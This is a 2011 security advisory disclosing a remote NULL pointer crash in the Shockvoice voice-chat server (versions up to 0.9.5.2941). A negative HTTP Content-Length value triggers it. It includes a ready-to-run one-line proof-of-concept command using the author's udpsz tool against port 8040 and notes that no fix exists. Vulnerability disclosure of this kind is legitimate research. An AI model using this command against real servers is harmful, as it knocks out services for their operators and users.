####################################################################### Luigi Auriemma Application: Shockvoice http://www.shockvoice.net Versions: <= v0.9.5.2941 Platforms: Windows and Linux Bug: NULL pointer Exploitation: remote, versus server Date: 27 Jun 2011 (found and reported on my forum 15 Oct 2010) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Shockvoice is a voice communication program for gamers. ####################################################################### ====== 2) Bug ====== NULL pointer caused by a negative HTTP Content-Length value. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip udpsz -c "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: -1\r\n\r\nbye" SERVER 8040 -1 ####################################################################### ====== 4) Fix ====== No fix. #######################################################################